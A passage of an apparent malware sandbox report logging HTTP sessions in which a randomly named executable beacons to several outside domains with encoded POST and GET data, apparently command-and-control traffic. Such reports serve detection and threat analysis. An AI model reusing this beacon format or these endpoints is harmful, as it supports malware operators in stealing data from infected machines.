O2ePNNH0=rcFR0ScrqPh/y34sbrrIDt2ZpGE1dsC2Kmpl3O93Z3nbfef/iAN2ZKopqTytkcCBed6UZnz1DIVDGNvwmmS//mL32gYBoI29ASjnNAQRcPcak8U6v3i9pb2wz0rpumG8eF2NUzM4ri5dUnCLwnYYJUUfqkRQLlV0y76jSBSOj+k2VuVUwdVYZiBRz5rflD5al6C6XEw/lkNBqwtUSiuPCH38boiztDzqfkAO8VwT7du9ItXU6vYhtEPLNTusliIbux5lhnzUq+4SlykPlx1f2aE6HOW467cXQC97Tx+raBjOCbhUv8vj3EopdtD+mtP53pnVXFv4a1hT8rwGQ7hmWDb6cA0bGQfibdHo78CEO2FgSp8kTNn0kUSchtZt4WSyzugfsKccbAFUEzqcZtmny20l6PmDQS+YHBGbbAoNUfqsjCNdgBlWgLChJxTMvYfxaRq3hqzeoEpEMDJCYP8HvFcLy1EJaF5saVNEWCFtEOQFHto6Sx75JCimViUL2CqHaBtORU5MmJxzBxdRhHYZSqQqMTv5hbc0fBGFLLGYFlP8+CHQnVa/cDJAiNJv8R/eysfG4QhqX2zwnjAwUpgMW1j2bIfBOg6F5dOb9pYqjOyY4swixuhthmTKmtkVW/97Fim/MWv4Q5TfNBPP1eL1/72FGwlr8V7w9zsSYFQneLCLLyL+ItB0wOKkfgPC0a8x4enGGfi3pRUqF8x6QXvM4CeCugV9SwnqheSyeyTY6ot+WCybaDyRg34Gj7wXA+/yi8siNLLRrPFWZh5iLXFoUBG4bu/gJRgKA5gHGrNcvj77jNQi8o80VREtvKZhbMUMgT7ZMJ0CuPPr4U9M8wOCl/MOk/e1jSkvHLHVHqf+aT6+9fJtReBZF3dB/hbFYY59sRLPKtQ0NVl7uh8Y47qiFmKskSBG/LywISaDOXql0EEXnG2F3u6OduHIRZYOZGJdJTKI+ns93KY7ssyfzl18xAgYrRfZvdlXrywyt6hWpCX [TRUNCATED]
Jan 6, 2025 16:03:20.887408972 CET	810	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 Jan 2025 15:03:20 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 06 Jan 2025 16:03:20 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uOttJj2u%2FQqaf6%2BFQa9cujqudkd0CxsKBNpltiX7l3kTPuA%2BlxlXlKqQqtQKMlX8uWtkmtxbFqDQ8B0ekkj3XKITLkKsW%2BxUm6QQuQm93%2BxAG9jji%2B0VpHkJKJWSrkQz3LMX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8fdc982309e50f45-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	60156	104.21.13.141	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:22.956294060 CET	479	OUT	GET /q1v9/?O2ePNNH0=metx3mUju98G7hAfRriWQtmXkGN9W+/XJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7QiThxgVyK6NCTKme3kYRuxLt+QsgneNlbuT0nXrlnHVaA==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.ogbos88.cyou Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:03:23.479895115 CET	779	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 Jan 2025 15:03:23 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 06 Jan 2025 16:03:23 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8u0dLokXgXDlm79LPz4I4kxQQktt7z2lqb%2F1kkLFgG%2Fe5EzJz00eEGz6JM9skMYcgWj9VLBKFlqxlVDFv405rFpldCSwuaA1nxMZeJm9AvrTiJd99iusozv3vBuTeXmqWXJU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fdc98334e458c63-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	60199	15.197.240.20	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:28.811827898 CET	748	OUT	POST /u8xw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.esscosaathi.info Origin: http://www.esscosaathi.info Referer: http://www.esscosaathi.info/u8xw/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 76 2b 49 33 42 35 6e 6f 30 31 4b 30 6c 6d 64 5a 6c 32 72 74 44 5a 4a 4f 36 4c 48 52 32 66 37 58 52 56 41 37 74 46 59 65 5a 4f 70 41 34 70 44 78 35 54 55 58 59 64 53 44 6d 32 56 46 64 46 4a 54 71 4c 70 63 78 36 79 54 58 2b 4a 42 37 2b 47 56 76 2f 43 41 4e 50 72 47 68 46 55 6e 56 57 63 6b 6a 46 53 63 54 6a 75 73 6c 4b 4a 65 6b 64 65 34 4a 44 30 76 7a 30 4f 7a 4c 32 71 33 70 54 5a 67 75 70 69 58 63 67 46 4f 51 71 4d 6b 55 78 55 59 78 6c 4f 67 77 50 48 79 56 73 62 74 35 76 78 74 37 5a 54 4e 4d 41 42 75 65 50 32 57 75 33 45 51 4d 4c 4b 34 71 53 56 76 42 2b 4c 47 37 35 68 71 36 6a 67 30 55 4d 6b 3d Data Ascii: O2ePNNH0=v+I3B5no01K0lmdZl2rtDZJO6LHR2f7XRVA7tFYeZOpA4pDx5TUXYdSDm2VFdFJTqLpcx6yTX+JB7+GVv/CANPrGhFUnVWckjFScTjuslKJekde4JD0vz0OzL2q3pTZgupiXcgFOQqMkUxUYxlOgwPHyVsbt5vxt7ZTNMABueP2Wu3EQMLK4qSVvB+LG75hq6jg0UMk=
Jan 6, 2025 16:03:29.254667997 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	60215	15.197.240.20	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:31.365015984 CET	768	OUT	POST /u8xw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.esscosaathi.info Origin: http://www.esscosaathi.info Referer: http://www.esscosaathi.info/u8xw/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 76 2b 49 33 42 35 6e 6f 30 31 4b 30 6a 48 74 5a 6e 56 44 74 45 35 4a 50 6d 62 48 52 39 2f 37 54 52 56 45 37 74 41 38 30 65 38 4e 41 39 37 62 78 33 32 6f 58 56 39 53 44 2b 47 56 4d 5a 46 4a 63 71 4b 55 68 78 35 71 54 58 36 68 42 37 2b 57 56 6f 49 65 44 50 66 72 45 71 6c 55 79 52 57 63 6b 6a 46 53 63 54 6a 36 57 6c 4b 68 65 6c 73 4f 34 50 6e 59 67 36 55 4f 73 64 47 71 33 74 54 5a 73 75 70 6a 77 63 6c 74 6f 51 6f 6b 6b 55 30 77 59 77 33 32 68 6e 2f 48 30 59 4d 61 43 2b 4b 59 63 79 4f 4b 6f 53 78 52 38 53 50 76 76 72 42 31 36 57 70 43 2b 70 53 39 45 42 39 6a 77 2b 4f 38 43 67 41 77 45 4b 62 7a 73 58 48 48 77 36 4d 58 41 2f 50 6c 32 33 6a 33 62 2f 76 79 49 Data Ascii: O2ePNNH0=v+I3B5no01K0jHtZnVDtE5JPmbHR9/7TRVE7tA80e8NA97bx32oXV9SD+GVMZFJcqKUhx5qTX6hB7+WVoIeDPfrEqlUyRWckjFScTj6WlKhelsO4PnYg6UOsdGq3tTZsupjwcltoQokkU0wYw32hn/H0YMaC+KYcyOKoSxR8SPvvrB16WpC+pS9EB9jw+O8CgAwEKbzsXHHw6MXA/Pl23j3b/vyI
Jan 6, 2025 16:03:31.804306030 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	60231	15.197.240.20	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:33.945579052 CET	1785	OUT	POST /u8xw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.esscosaathi.info Origin: http://www.esscosaathi.info Referer: http://www.esscosaathi.info/u8xw/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 76 2b 49 33 42 35 6e 6f 30 31 4b 30 6a 48 74 5a 6e 56 44 74 45 35 4a 50 6d 62 48 52 39 2f 37 54 52 56 45 37 74 41 38 30 65 38 46 41 68 59 54 78 34 78 38 58 55 39 53 44 33 6d 56 4a 5a 46 4a 37 71 4b 4e 71 78 35 6e 6b 58 38 6c 42 36 64 75 56 74 35 65 44 46 66 72 45 6c 46 55 6d 56 57 64 2b 6a 47 72 58 54 6a 71 57 6c 4b 68 65 6c 76 6d 34 4d 7a 30 67 32 30 4f 7a 4c 32 71 7a 70 54 59 35 75 70 72 4b 63 6c 68 65 51 35 45 6b 55 55 67 59 33 45 4f 68 6c 66 48 32 57 73 61 61 2b 4b 63 48 79 4b 72 58 53 78 6c 53 53 4e 76 76 70 51 49 4e 42 4a 62 6d 77 43 77 7a 46 4f 76 7a 79 2b 38 7a 68 79 49 32 57 70 33 76 64 7a 4b 45 34 2f 72 36 32 65 67 44 32 33 43 50 78 70 44 46 4d 6c 65 54 55 6c 4a 63 6c 64 72 6c 69 33 51 65 2b 75 54 57 6b 75 34 6f 42 57 4d 36 7a 46 52 46 51 2f 34 34 69 65 39 62 76 64 74 41 4b 4b 74 51 67 51 4e 61 70 62 77 6d 49 42 69 53 35 52 68 51 39 77 48 6e 6e 57 54 38 30 2b 31 71 77 70 39 33 4a 35 36 49 4d 55 6a 46 38 44 4e 6e 6c 59 6f 63 55 4c 56 57 33 66 52 48 35 33 69 66 62 [TRUNCATED] Data Ascii: O2ePNNH0=v+I3B5no01K0jHtZnVDtE5JPmbHR9/7TRVE7tA80e8FAhYTx4x8XU9SD3mVJZFJ7qKNqx5nkX8lB6duVt5eDFfrElFUmVWd+jGrXTjqWlKhelvm4Mz0g20OzL2qzpTY5uprKclheQ5EkUUgY3EOhlfH2Wsaa+KcHyKrXSxlSSNvvpQINBJbmwCwzFOvzy+8zhyI2Wp3vdzKE4/r62egD23CPxpDFMleTUlJcldrli3Qe+uTWku4oBWM6zFRFQ/44ie9bvdtAKKtQgQNapbwmIBiS5RhQ9wHnnWT80+1qwp93J56IMUjF8DNnlYocULVW3fRH53ifb7EJtrY53Lbry027mr6XhWcLozzdEQkJ7cWmVtylwYhMUGeRLCRyTnyXSfY1x4aJCVH2Xk0uu60u+LcHOuK8BjBm5bxNiO/IHY4r8rbbwwz4ewFdyHGhesXUPMsx6QQVpsMusyMzkNIhwUqPxpQ2yqn1YokUo06gAdhcRESgoUsGt4+QIpFfAAf2fVFd5bF8bnZhpbDBR1ETHH0DXN/Z1LDAnBI5CLsJWSBJGsw+9DYEX6xOpfyxDvNAUIJxyoVrXOaRRvGeuguGRkgz5VrKQKAQHFdbDMV4pCLH3bbEatY2nnThm7VSiaok/yQfC00upStrHEBWIlDSsALLrrN2YpmiX/MTzk4Xcgz+2ABrGWSmo6vAQp/ks3oPGC5GSwTjXLDVcfG3dEBtwGiVaSw2DpmpgmV4TyUEBEDpHHT0z2iy8C9Fpa3hsIf5+b/ovyByu386op69/Bo21ZxjA5phcZrcUFYhUofHozt7TTYwf63si4hz2a03A0XmAQmxCfJCK6Xgw/BDPNLDCtoaF4b91rLUYVVbLXRpZ79NbWNL+kXVJciwlP2orVIzvZ6FqB6A90GJs07dqof6aq9TSELv2gCjNc5j4g8ul1rI6+gtCQcBeTRPSX2TNupiUCCwpwYtPURSKStbZs+33JXsbBro30BibAygeMbhD9W [TRUNCATED]
Jan 6, 2025 16:03:34.383085966 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	60248	15.197.240.20	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:36.485178947 CET	483	OUT	GET /u8xw/?O2ePNNH0=i8gXCJLEz0m1jkVF91XubMUJuq2NwOyQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL/uh8mRcEHcFuW3RH1uzlL0AosO+KRcAyFW3Nm3vkB9lzg==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.esscosaathi.info Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:03:37.959880114 CET	392	IN	HTTP/1.1 200 OK content-type: text/html date: Mon, 06 Jan 2025 15:03:37 GMT content-length: 271 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 32 65 50 4e 4e 48 30 3d 69 38 67 58 43 4a 4c 45 7a 30 6d 31 6a 6b 56 46 39 31 58 75 62 4d 55 4a 75 71 32 4e 77 4f 79 51 65 67 63 62 33 6e 55 73 58 4f 5a 34 6e 35 2f 69 31 69 34 62 63 39 69 6e 2b 42 68 52 51 44 70 4c 31 72 70 43 69 72 48 79 55 2b 68 56 7a 6f 53 78 76 34 32 45 4c 2f 75 68 38 6d 52 63 45 48 63 46 75 57 33 52 48 31 75 7a 6c 4c 30 41 6f 73 4f 2b 4b 52 63 41 79 46 57 33 4e 6d 33 76 6b 42 39 6c 7a 67 3d 3d 26 35 36 2d 48 3d 32 74 32 78 75 7a 70 58 32 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O2ePNNH0=i8gXCJLEz0m1jkVF91XubMUJuq2NwOyQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL/uh8mRcEHcFuW3RH1uzlL0AosO+KRcAyFW3Nm3vkB9lzg==&56-H=2t2xuzpX2"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	60293	136.243.225.5	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:43.072010040 CET	754	OUT	POST /y3ui/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/y3ui/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 4f 36 54 6c 2b 78 6d 58 52 37 6a 55 78 55 61 50 50 48 57 49 36 32 35 78 51 61 56 53 6c 30 6b 6a 45 43 6b 78 43 6b 73 47 4f 32 50 6d 52 69 4b 44 47 75 54 2f 64 44 74 78 49 4b 2f 55 75 45 67 47 42 33 48 73 50 5a 6c 56 47 6d 77 37 44 79 4c 6b 71 56 31 6c 73 56 75 51 41 54 6f 72 34 6e 57 6c 55 43 53 7a 41 4f 53 59 5a 67 68 35 61 44 4f 31 53 35 75 55 4a 53 67 68 65 39 53 77 6d 5a 70 77 36 33 42 61 4b 6b 4f 68 35 57 77 4e 7a 46 4d 76 6f 71 56 4f 37 62 78 4d 2b 47 35 35 68 35 45 6f 43 30 42 78 75 59 71 38 70 65 52 32 6c 57 38 37 55 77 69 57 31 6c 58 54 53 41 70 71 4f 33 65 5a 41 51 4f 72 4d 76 6b 3d Data Ascii: O2ePNNH0=O6Tl+xmXR7jUxUaPPHWI625xQaVSl0kjECkxCksGO2PmRiKDGuT/dDtxIK/UuEgGB3HsPZlVGmw7DyLkqV1lsVuQATor4nWlUCSzAOSYZgh5aDO1S5uUJSghe9SwmZpw63BaKkOh5WwNzFMvoqVO7bxM+G55h5EoC0BxuYq8peR2lW87UwiW1lXTSApqO3eZAQOrMvk=
Jan 6, 2025 16:03:43.690332890 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Mon, 06 Jan 2025 15:03:40 GMT location: https://www.myfastuploader.sbs/y3ui/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	60310	136.243.225.5	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:45.615884066 CET	774	OUT	POST /y3ui/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/y3ui/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 4f 36 54 6c 2b 78 6d 58 52 37 6a 55 7a 32 4f 50 44 41 4b 49 79 32 35 79 56 61 56 53 75 55 6b 76 45 43 6f 78 43 6c 35 4e 4f 6a 2f 6d 52 48 75 44 46 72 2f 2f 59 44 74 78 44 71 2f 72 67 6b 68 4b 42 33 37 4f 50 59 70 56 47 6d 6b 37 44 7a 37 6b 71 69 4a 6b 76 6c 75 53 5a 6a 6f 70 33 48 57 6c 55 43 53 7a 41 4f 47 32 5a 6a 52 35 61 79 2b 31 54 63 53 62 44 79 67 69 49 74 53 77 69 5a 70 73 36 33 42 38 4b 6d 37 47 35 55 59 4e 7a 46 38 76 6f 2f 70 50 78 62 78 4f 36 47 34 4b 68 4a 35 45 41 48 39 66 74 6f 6d 4d 67 63 64 44 67 67 4e 52 4f 53 71 51 32 6c 2f 34 53 44 42 63 4c 41 44 78 61 7a 65 62 53 34 78 74 79 44 6f 2b 4d 50 2f 67 36 46 31 61 61 63 55 6d 47 54 45 6c Data Ascii: O2ePNNH0=O6Tl+xmXR7jUz2OPDAKIy25yVaVSuUkvECoxCl5NOj/mRHuDFr//YDtxDq/rgkhKB37OPYpVGmk7Dz7kqiJkvluSZjop3HWlUCSzAOG2ZjR5ay+1TcSbDygiItSwiZps63B8Km7G5UYNzF8vo/pPxbxO6G4KhJ5EAH9ftomMgcdDggNROSqQ2l/4SDBcLADxazebS4xtyDo+MP/g6F1aacUmGTEl
Jan 6, 2025 16:03:46.238909960 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Mon, 06 Jan 2025 15:03:43 GMT location: https://www.myfastuploader.sbs/y3ui/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	60330	136.243.225.5	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:48.164146900 CET	1791	OUT	POST /y3ui/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/y3ui/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 4f 36 54 6c 2b 78 6d 58 52 37 6a 55 7a 32 4f 50 44 41 4b 49 79 32 35 79 56 61 56 53 75 55 6b 76 45 43 6f 78 43 6c 35 4e 4f 6a 33 6d 52 56 6d 44 46 49 48 2f 66 44 74 78 4f 4b 2f 51 67 6b 67 51 42 33 54 4b 50 59 55 69 47 6b 63 37 44 